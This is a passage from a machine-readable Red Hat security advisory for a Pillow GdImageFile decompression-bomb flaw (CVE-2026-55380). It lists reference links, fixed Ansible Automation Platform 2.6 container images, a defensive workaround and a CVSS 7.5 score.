"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675",
"url": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm"
}
],
"release_date": "2026-07-06T18:50:14.789000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "Avoid processing untrusted GD 2.x image files with PIL.GdImageFile.open(). Use Image.open() instead, which includes decompression bomb protections for supported formats. If GdImageFile must be used, validate the image dimensions before calling load(). Restricting accepted image formats at the application boundary to only those explicitly needed can reduce exposure.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
